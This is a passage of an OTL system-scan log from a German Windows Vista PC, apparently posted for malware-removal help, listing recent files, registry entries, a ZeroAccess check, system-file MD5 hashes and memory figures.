{E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\Windows\system32\unregmp2.exe /ShowWMP ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\system32\ie4uinit.exe -UserIconConfig ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP NetSvcs: FastUserSwitchingCompatibility - File not found NetSvcs: Ias - C:\Windows\System32\ias.dll (Microsoft Corporation) NetSvcs: Nla - File not found NetSvcs: Ntmssvc - File not found NetSvcs: NWCWorkstation - File not found NetSvcs: Nwsapagent - File not found NetSvcs: SRService - File not found NetSvcs: WmdmPmSp - File not found NetSvcs: LogonHours - File not found NetSvcs: PCAudit - File not found NetSvcs: helpsvc - File not found NetSvcs: uploadmgr - File not found CREATERESTOREPOINT Restore point Set: OTL Restore Point ========== Files/Folders - Created Within 30 Days ========== [2013.02.28 21:32:04 | 000,000,000 | ---D | C] -- C:\Users\DBoy\Desktop\dateien [2013.02.28 21:28:29 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\DBoy\Desktop\OTL.exe [2013.02.28 18:42:11 | 000,000,000 | ---D | C] -- C:\Users\DBoy\AppData\Roaming\Spyware Terminator [2013.02.28 18:42:11 | 000,000,000 | ---D | C] -- C:\ProgramData\Spyware Terminator [2013.02.28 18:42:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spyware Terminator 2012 [2013.02.28 18:41:26 | 000,000,000 | ---D | C] -- C:\Program Files\Spyware Terminator [2013.02.28 18:40:45 | 000,937,224 | ---- | C] (Crawler.com ) -- C:\Users\DBoy\Desktop\SpywareTerminator30074Setup.exe [2013.02.22 15:07:24 | 000,000,000 | ---D | C] -- C:\Program Files\TeamViewer [2013.02.22 14:42:44 | 005,845,208 | ---- | C] (TeamViewer GmbH) -- C:\Users\DBoy\Desktop\TeamViewer_Setup_de.exe [2013.02.20 16:20:48 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Firefox [2013.02.20 00:21:20 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Thunderbird [2013.02.03 15:04:30 | 000,000,000 | ---D | C] -- C:\Program Files\MSXML 4.0 [2013.02.03 14:49:57 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Printers [2013.02.03 14:46:40 | 000,217,600 | ---- | C] (SEC) -- C:\Windows\System32\SIPDUtil.dll [2013.02.03 14:46:40 | 000,137,384 | ---- | C] (Samsung Electronics CO., LTD.) -- C:\Windows\System32\SUPDSvcA.dll [2013.02.03 14:46:40 | 000,127,656 | ---- | C] (Samsung Electronics CO., LTD.) -- C:\Windows\System32\SUPDSvc.exe [2013.02.03 14:46:39 | 000,151,552 | ---- | C] (SS) -- C:\Windows\System32\spd__ci.exe [2013.02.03 14:46:39 | 000,065,536 | ---- | C] (SS) -- C:\Windows\System32\spd__ci.dll [2013.02.03 14:46:30 | 000,005,120 | ---- | C] (Samsung Electronics) -- C:\Windows\System32\drivers\SSPORT.SYS [2013.02.03 14:46:29 | 000,000,000 | ---D | C] -- C:\Program Files\Samsung [2013.02.03 14:46:19 | 000,000,000 | ---D | C] -- C:\Temp [2013.02.03 14:45:06 | 027,283,025 | ---- | C] (Samsung ) -- C:\Users\DBoy\Desktop\SamsungUniversalPrintDriver.exe [2013.02.03 14:41:17 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\SWF Studio [2013.02.03 14:40:47 | 000,000,000 | ---D | C] -- C:\Windows\Samsung [2013.02.03 14:39:43 | 000,000,000 | ---D | C] -- C:\Program Files\EazelBar [2 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ] ========== Files - Modified Within 30 Days ========== [2013.02.28 21:53:26 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 [2013.02.28 21:53:26 | 000,003,616 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 [2013.02.28 21:53:11 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat [2013.02.28 21:53:01 | 3220,463,616 | -HS- | M] () -- C:\hiberfil.sys [2013.02.28 21:52:03 | 000,000,012 | ---- | M] () -- C:\Windows\bthservsdp.dat [2013.02.28 21:28:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\DBoy\Desktop\OTL.exe [2013.02.28 21:13:00 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job [2013.02.28 20:00:15 | 000,000,416 | -H-- | M] () -- C:\Windows\tasks\User_Feed_Synchronization-{DA6E10C5-8C26-4239-930B-F93C091E7ABE}.job [2013.02.28 18:55:59 | 175,072,145 | ---- | M] () -- C:\Windows\MEMORY.DMP [2013.02.28 18:42:10 | 000,000,854 | ---- | M] () -- C:\Users\Public\Desktop\Spyware Terminator 2012.lnk [2013.02.28 18:40:46 | 000,937,224 | ---- | M] (Crawler.com ) -- C:\Users\DBoy\Desktop\SpywareTerminator30074Setup.exe [2013.02.25 18:36:58 | 000,014,927 | ---- | M] () -- C:\Users\DBoy\Desktop\info-button.png [2013.02.25 18:24:11 | 000,005,908 | ---- | M] () -- C:\Users\DBoy\Desktop\airptint.abw [2013.02.23 15:37:05 | 000,110,219 | ---- | M] () -- C:\Users\DBoy\Desktop\button.jpg [2013.02.22 16:28:10 | 000,229,672 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT [2013.02.22 15:07:28 | 000,000,962 | ---- | M] () -- C:\Users\Public\Desktop\TeamViewer 8.lnk [2013.02.22 14:42:45 | 005,845,208 | ---- | M] (TeamViewer GmbH) -- C:\Users\DBoy\Desktop\TeamViewer_Setup_de.exe [2013.02.22 13:10:07 | 000,124,839 | ---- | M] () -- C:\Users\DBoy\Desktop\j.jpg [2013.02.22 13:09:39 | 000,177,632 | ---- | M] () -- C:\Users\DBoy\Desktop\l.jpg [2013.02.17 18:01:30 | 000,004,334 | ---- | M] () -- C:\Users\DBoy\Desktop\Ultrasport-Power-Stepper-mit-Handpuls-Sensoren-silber.jpg [2013.02.10 03:22:30 | 000,018,432 | ---- | M] () -- C:\Users\DBoy\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2013.02.03 14:49:59 | 000,000,138 | ---- | M] () -- C:\Users\DBoy\Desktop\SAMSUNG Dr.Printer.url [2013.02.03 14:45:25 | 027,283,025 | ---- | M] (Samsung ) -- C:\Users\DBoy\Desktop\SamsungUniversalPrintDriver.exe [2 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ] ========== Files Created - No Company Name ========== [2013.02.28 18:42:12 | 000,032,768 | ---- | C] () -- C:\Windows\System32\drivers\sp_rsdrv2.sys [2013.02.28 18:42:10 | 000,000,854 | ---- | C] () -- C:\Users\Public\Desktop\Spyware Terminator 2012.lnk [2013.02.25 18:36:57 | 000,014,927 | ---- | C] () -- C:\Users\DBoy\Desktop\info-button.png [2013.02.25 18:24:11 | 000,005,908 | ---- | C] () -- C:\Users\DBoy\Desktop\airptint.abw [2013.02.23 15:37:05 | 000,110,219 | ---- | C] () -- C:\Users\DBoy\Desktop\button.jpg [2013.02.22 15:07:28 | 000,000,974 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 8.lnk [2013.02.22 15:07:28 | 000,000,962 | ---- | C] () -- C:\Users\Public\Desktop\TeamViewer 8.lnk [2013.02.22 13:10:07 | 000,124,839 | ---- | C] () -- C:\Users\DBoy\Desktop\j.jpg [2013.02.22 13:09:38 | 000,177,632 | ---- | C] () -- C:\Users\DBoy\Desktop\l.jpg [2013.02.17 18:01:29 | 000,004,334 | ---- | C] () -- C:\Users\DBoy\Desktop\Ultrasport-Power-Stepper-mit-Handpuls-Sensoren-silber.jpg [2013.02.03 14:49:59 | 000,000,138 | ---- | C] () -- C:\Users\DBoy\Desktop\SAMSUNG Dr.Printer.url [2013.02.03 14:49:57 | 000,483,328 | ---- | C] () -- C:\Windows\ssndii.exe [2013.02.03 14:46:40 | 000,026,624 | ---- | C] () -- C:\Windows\System32\spd__l3.dll [2013.02.03 14:46:40 | 000,000,363 | ---- | C] () -- C:\Windows\System32\spd__l3.smt [2013.02.03 14:46:39 | 000,339,968 | ---- | C] () -- C:\Windows\System32\DscPnt1.dll [2013.02.03 14:46:39 | 000,233,472 | ---- | C] () -- C:\Windows\System32\DscPnt0.dll [2013.02.03 14:46:39 | 000,229,376 | ---- | C] () -- C:\Windows\System32\DscPnt.dll [2013.01.06 13:53:34 | 000,810,496 | ---- | C] () -- C:\Windows\System32\xvidcore.dll [2013.01.06 13:53:34 | 000,183,808 | ---- | C] () -- C:\Windows\System32\xvidvfw.dll [2013.01.06 13:53:34 | 000,080,896 | ---- | C] () -- C:\Windows\System32\ff_vfw.dll [2012.11.19 23:59:29 | 000,018,432 | ---- | C] () -- C:\Users\DBoy\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2012.11.13 18:46:30 | 000,106,605 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchema.bin [2012.11.13 18:46:30 | 000,018,904 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchemaTrivial.bin [2012.11.12 06:59:56 | 000,033,136 | ---- | C] () -- C:\Windows\ASScrPro.exe [2012.11.12 06:59:46 | 000,047,672 | ---- | C] () -- C:\Windows\AsScrProlog.exe [2012.11.12 06:19:05 | 000,081,920 | ---- | C] () -- C:\Windows\PGMONITOR.EXE [2012.11.12 06:18:51 | 003,107,788 | ---- | C] () -- C:\Windows\System32\atiumdva.dat [2012.11.12 06:18:50 | 000,159,744 | ---- | C] () -- C:\Windows\System32\atitmmxx.dll [2012.11.12 06:18:50 | 000,081,920 | ---- | C] () -- C:\Windows\System32\ATIODE.exe [2012.11.12 06:18:50 | 000,045,056 | ---- | C] () -- C:\Windows\System32\ATIODCLI.exe [2012.11.12 06:18:49 | 000,176,214 | ---- | C] () -- C:\Windows\System32\atiicdxx.dat [2012.11.12 06:17:06 | 001,060,424 | ---- | C] () -- C:\Windows\System32\WdfCoInstaller01000.dll [2012.11.12 06:14:03 | 000,015,928 | ---- | C] ( ) -- C:\Windows\System32\drivers\kbfiltr.sys [2012.11.12 06:12:53 | 001,752,704 | ---- | C] () -- C:\Windows\System32\drivers\snp2uvc.sys [2012.11.12 06:12:53 | 000,028,672 | ---- | C] () -- C:\Windows\System32\drivers\sncduvc.sys [2012.11.12 06:03:45 | 000,000,000 | ---- | C] () -- C:\Windows\ativpsrm.bin [2012.11.12 05:35:03 | 000,000,012 | ---- | C] () -- C:\Windows\bthservsdp.dat [2008.07.02 04:28:38 | 000,061,440 | ---- | C] () -- C:\Program Files\Common Files\CPInstallAction.dll [2008.05.22 18:35:54 | 000,051,962 | ---- | C] () -- C:\Program Files\Common Files\banner.jpg ========== ZeroAccess Check ========== [2006.11.02 13:54:22 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2011.01.21 16:46:32 | 011,582,464 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2009.03.03 05:36:24 | 000,615,424 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] "" = %systemroot%\system32\wbem\wbemess.dll -- [2008.01.21 03:24:03 | 000,347,648 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both ========== LOP Check ========== [2013.02.25 21:19:50 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\AbiSuite [2012.12.31 16:40:54 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\DVDVideoSoft [2012.12.31 16:40:36 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\DVDVideoSoftIEHelpers [2013.02.28 21:48:09 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\FileZilla [2012.12.28 23:31:27 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\Notepad++ [2013.02.28 18:42:11 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\Spyware Terminator [2012.11.12 18:25:19 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\Thunderbird ========== Purity Check ========== ========== Custom Scans ========== < %SYSTEMDRIVE%\*. > [2012.11.11 23:20:31 | 000,000,000 | -HSD | M] -- C:\$Recycle.Bin [2008.04.16 12:27:15 | 000,000,000 | -HSD | M] -- C:\Boot [2006.11.02 14:02:03 | 000,000,000 | -HSD | M] -- C:\Documents and Settings [2012.11.12 18:01:30 | 000,000,000 | ---D | M] -- C:\Firefox [2008.01.21 03:32:31 | 000,000,000 | ---D | M] -- C:\PerfLogs [2013.02.28 18:41:26 | 000,000,000 | R--D | M] -- C:\Program Files [2013.02.28 18:42:11 | 000,000,000 | -H-D | M] -- C:\ProgramData [2013.02.28 22:01:50 | 000,000,000 | -HSD | M] -- C:\System Volume Information [2013.02.03 14:46:19 | 000,000,000 | ---D | M] -- C:\Temp [2012.11.11 23:17:37 | 000,000,000 | R--D | M] -- C:\Users [2013.02.28 18:55:59 | 000,000,000 | ---D | M] -- C:\Windows < %PROGRAMFILES%\*.exe > < %LOCALAPPDATA%\*.exe > < %systemroot%\*. /mp /s > < C:\Windows\system32\*.tsp > [2006.11.02 10:44:49 | 000,031,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\hidphone.tsp [2006.11.02 10:44:49 | 000,038,400 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\kmddsp.tsp [2006.11.02 10:44:49 | 000,049,664 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\ndptsp.tsp [2006.11.02 10:44:49 | 000,081,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\remotesp.tsp [2008.01.21 03:24:48 | 000,280,064 | ---- | M] (Microsoft Corporation) -- C:\Windows\system32\unimdm.tsp [2006.11.02 14:01:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT [2006.11.02 14:01:49 | 000,032,582 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT [2012.11.12 18:31:04 | 000,000,884 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job [2013.01.06 03:26:21 | 000,000,416 | -H-- | C] () -- C:\Windows\Tasks\User_Feed_Synchronization-{DA6E10C5-8C26-4239-930B-F93C091E7ABE}.job < MD5 for: AGP440.SYS > [2008.01.21 03:23:01 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\System32\drivers\AGP440.sys [2008.01.21 03:23:01 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_f750e484\AGP440.sys [2008.01.21 03:23:01 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6001.18000_none_ba12ed3bbeb0d97a\AGP440.sys [2008.01.21 03:23:01 | 000,056,376 | ---- | M] (Microsoft Corporation) MD5=13F9E33747E6B41A3FF305C37DB0D360 -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.0.6002.18005_none_bbfe6647bbd2a4c6\AGP440.sys [2006.11.02 10:49:52 | 000,053,864 | ---- | M] (Microsoft Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_920a2c1f\AGP440.sys < MD5 for: ATAPI.SYS > [2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\SoftwareDistribution\Download\bcfed137e95e2bc1b83ef80262a82b16\x86_mshdc.inf_31bf3856ad364e35_6.0.6002.18005_none_df23a1261eab99e8\atapi.sys [2008.01.21 03:23:00 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\System32\drivers\atapi.sys [2008.01.21 03:23:00 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_cc18792d\atapi.sys [2008.01.21 03:23:00 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6001.18000_none_dd38281a2189ce9c\atapi.sys [2006.11.02 10:49:36 | 000,019,048 | ---- | M] (Microsoft Corporation) MD5=4F4FCB8B6EA06784FB6D475B7EC7300F -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_c6c2e699\atapi.sys < MD5 for: CNGAUDIT.DLL > [2006.11.02 10:46:03 | 000,011,776 | ---- | M] (Microsoft Corporation) MD5=7F15B4953378C8B5161D65C26D5FED4D -- C:\Windows\System32\cngaudit.dll [2006.11.02 10:46:03 | 000,011,776 | ---- | M] (Microsoft Corporation) MD5=7F15B4953378C8B5161D65C26D5FED4D -- C:\Windows\winsxs\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.0.6000.16386_none_e62d292932a96ce6\cngaudit.dll < MD5 for: EXPLORER.EXE > [2008.10.29 07:20:29 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=37440D09DEAE0B672A04DCCF7ABF06BE -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16771_none_4f83bb287ccdb7e3\explorer.exe [2008.10.29 07:29:41 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=4F554999D7D5F05DAAEBBA7B5BA1089D -- C:\Windows\explorer.exe [2008.10.29 07:29:41 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=4F554999D7D5F05DAAEBBA7B5BA1089D -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18164_none_5177ca9879e978e8\explorer.exe [2008.10.30 04:59:17 | 002,927,616 | ---- | M] (Microsoft Corporation) MD5=50BA5850147410CDE89C523AD3BC606E -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.22298_none_51e4f8c7931bd1e1\explorer.exe [2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\SoftwareDistribution\Download\bcfed137e95e2bc1b83ef80262a82b16\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6002.18005_none_53a0201e76de3a0b\explorer.exe [2008.10.28 03:15:02 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=E7156B0B74762D9DE0E66BDCDE06E5FB -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.20947_none_5033cb5995cd990b\explorer.exe [2008.01.21 03:24:24 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=FFA764631CB70A30065C12EF8E174F9F -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18000_none_51b4a71279bc6ebf\explorer.exe < MD5 for: IASTORV.SYS > [2008.01.21 03:23:23 | 000,235,064 | ---- | M] (Intel Corporation) MD5=54155EA1B0DF185878E0FC9EC3AC3A14 -- C:\Windows\System32\drivers\iaStorV.sys [2008.01.21 03:23:23 | 000,235,064 | ---- | M] (Intel Corporation) MD5=54155EA1B0DF185878E0FC9EC3AC3A14 -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_c9df7691\iaStorV.sys [2008.01.21 03:23:23 | 000,235,064 | ---- | M] (Intel Corporation) MD5=54155EA1B0DF185878E0FC9EC3AC3A14 -- C:\Windows\winsxs\x86_iastorv.inf_31bf3856ad364e35_6.0.6001.18000_none_af11527887c7fa8f\iaStorV.sys [2006.11.02 10:51:25 | 000,232,040 | ---- | M] (Intel Corporation) MD5=C957BF4B5D80B46C5017BF0101E6C906 -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_37cdafa4\iaStorV.sys < MD5 for: NETLOGON.DLL > [2009.04.11 07:28:23 | 000,592,896 | ---- | M] (Microsoft Corporation) MD5=95DAECF0FB120A7B5DA679CC54E37DDE -- C:\Windows\SoftwareDistribution\Download\bcfed137e95e2bc1b83ef80262a82b16\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6002.18005_none_ffa3304f351bb3a3\netlogon.dll [2008.01.21 03:24:05 | 000,592,384 | ---- | M] (Microsoft Corporation) MD5=A8EFC0B6E75B789F7FD3BA5025D4E37F -- C:\Windows\System32\netlogon.dll [2008.01.21 03:24:05 | 000,592,384 | ---- | M] (Microsoft Corporation) MD5=A8EFC0B6E75B789F7FD3BA5025D4E37F -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6001.18000_none_fdb7b74337f9e857\netlogon.dll < MD5 for: NVSTOR.SYS > [2006.11.02 10:50:13 | 000,040,040 | ---- | M] (NVIDIA Corporation) MD5=9E0BA19A28C498A6D323D065DB76DFFC -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_733654ff\nvstor.sys [2008.01.21 03:23:21 | 000,045,112 | ---- | M] (NVIDIA Corporation) MD5=ABED0C09758D1D97DB0042DBB2688177 -- C:\Windows\System32\drivers\nvstor.sys [2008.01.21 03:23:21 | 000,045,112 | ---- | M] (NVIDIA Corporation) MD5=ABED0C09758D1D97DB0042DBB2688177 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_31c3d71d\nvstor.sys [2008.01.21 03:23:21 | 000,045,112 | ---- | M] (NVIDIA Corporation) MD5=ABED0C09758D1D97DB0042DBB2688177 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.0.6001.18000_none_39dac327befea467\nvstor.sys < MD5 for: SCECLI.DLL > [2008.01.21 03:24:50 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=28B84EB538F7E8A0FE8B9299D591E0B9 -- C:\Windows\System32\scecli.dll [2008.01.21 03:24:50 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=28B84EB538F7E8A0FE8B9299D591E0B9 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6001.18000_none_380de25bd91b6f12\scecli.dll [2009.04.11 07:28:24 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=8FC182167381E9915651267044105EE1 -- C:\Windows\SoftwareDistribution\Download\bcfed137e95e2bc1b83ef80262a82b16\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6002.18005_none_39f95b67d63d3a5e\scecli.dll < MD5 for: USER32.DLL > [2009.04.11 07:28:25 | 000,627,712 | ---- | M] (Microsoft Corporation) MD5=75510147B94598407666F4802797C75A -- C:\Windows\SoftwareDistribution\Download\bcfed137e95e2bc1b83ef80262a82b16\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6002.18005_none_cf23e54d6a7e4a7e\user32.dll [2008.01.21 03:24:21 | 000,627,200 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\System32\user32.dll [2008.01.21 03:24:21 | 000,627,200 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6001.18000_none_cd386c416d5c7f32\user32.dll < MD5 for: USERINIT.EXE > [2008.01.21 03:24:49 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\System32\userinit.exe [2008.01.21 03:24:49 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6001.18000_none_dc28ba15d1aff80b\userinit.exe < MD5 for: WINLOGON.EXE > [2009.04.11 07:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\SoftwareDistribution\Download\bcfed137e95e2bc1b83ef80262a82b16\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6002.18005_none_71ae7a22d2134741\winlogon.exe [2008.01.21 03:24:49 | 000,314,880 | ---- | M] (Microsoft Corporation) MD5=C2610B6BDBEFC053BBDAB4F1B965CB24 -- C:\Windows\System32\winlogon.exe [2008.01.21 03:24:49 | 000,314,880 | ---- | M] (Microsoft Corporation) MD5=C2610B6BDBEFC053BBDAB4F1B965CB24 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6001.18000_none_6fc30116d4f17bf5\winlogon.exe < MD5 for: WS2IFSL.SYS > [2008.01.21 03:24:47 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=E3A3CB253C0EC2494D4A61F5E43A389C -- C:\Windows\System32\drivers\ws2ifsl.sys [2008.01.21 03:24:47 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=E3A3CB253C0EC2494D4A61F5E43A389C -- C:\Windows\winsxs\x86_microsoft-windows-w..rastructure-ws2ifsl_31bf3856ad364e35_6.0.6001.18000_none_4f86a0d4c7cda641\ws2ifsl.sys < %systemroot%\system32\drivers\*.sys /lockedfiles > < %systemroot%\System32\config\*.sav > [2008.01.21 04:14:18 | 016,846,848 | ---- | M] () -- C:\Windows\System32\config\COMPONENTS.SAV [2008.01.21 04:14:08 | 000,106,496 | ---- | M] () -- C:\Windows\System32\config\DEFAULT.SAV [2008.01.21 04:14:18 | 000,020,480 | ---- | M] () -- C:\Windows\System32\config\SECURITY.SAV [2006.11.02 11:34:08 | 010,133,504 | ---- | M] () -- C:\Windows\System32\config\SOFTWARE.SAV [2006.11.02 11:34:08 | 001,826,816 | ---- | M] () -- C:\Windows\System32\config\SYSTEM.SAV < %systemroot%\system32\*.dll /lockedfiles > [2008.10.24 14:14:20 | 000,425,984 | ---- | M] (Advanced Micro Devices, Inc.) Unable to obtain MD5 -- C:\Windows\system32\ATIDEMGX.dll [2008.01.21 03:24:26 | 000,347,136 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\system32\dxtmsft.dll [2008.01.21 03:24:26 | 000,214,528 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\system32\dxtrans.dll < %USERPROFILE%\*.* > [2013.02.28 22:39:27 | 001,310,720 | -HS- | M] () -- C:\Users\DBoy\NTUSER.DAT [2013.02.28 22:39:26 | 000,262,144 | -H-- | M] () -- C:\Users\DBoy\ntuser.dat.LOG1 [2012.11.11 23:17:37 | 000,000,000 | -H-- | M] () -- C:\Users\DBoy\ntuser.dat.LOG2 [2013.02.28 21:51:58 | 000,065,536 | -HS- | M] () -- C:\Users\DBoy\NTUSER.DAT{3a539871-6a70-11db-887c-d362bd253390}.TM.blf [2013.02.28 21:51:58 | 000,524,288 | -HS- | M] () -- C:\Users\DBoy\NTUSER.DAT{3a539871-6a70-11db-887c-d362bd253390}.TMContainer00000000000000000001.regtrans-ms [2012.11.11 23:17:37 | 000,524,288 | -HS- | M] () -- C:\Users\DBoy\NTUSER.DAT{3a539871-6a70-11db-887c-d362bd253390}.TMContainer00000000000000000002.regtrans-ms [2012.11.11 23:17:38 | 000,000,020 | -HS- | M] () -- C:\Users\DBoy\ntuser.ini < %USERPROFILE%\Local Settings\Temp\*.exe > < %USERPROFILE%\Local Settings\Temp\*.dll > < %USERPROFILE%\Application Data\*.exe > < HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs > HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Required: DebugWindows [binary data] HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Windows: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16 < > < End of report > Code:
ATTFilter OTL Extras logfile created on: 28.02.2013 21:56:57 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\DBoy\Desktop
Windows Vista Home Premium Edition Service Pack 1 (Version = 6.0.6001) - Type = NTWorkstation
Internet Explorer (Version = 7.0.6001.18000)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
3,00 Gb Total Physical Memory | 1,98 Gb Available Physical Memory | 66,15% Memory free
6,19 Gb Paging File | 5,16 Gb Available in Paging File | 83,38% Paging File free
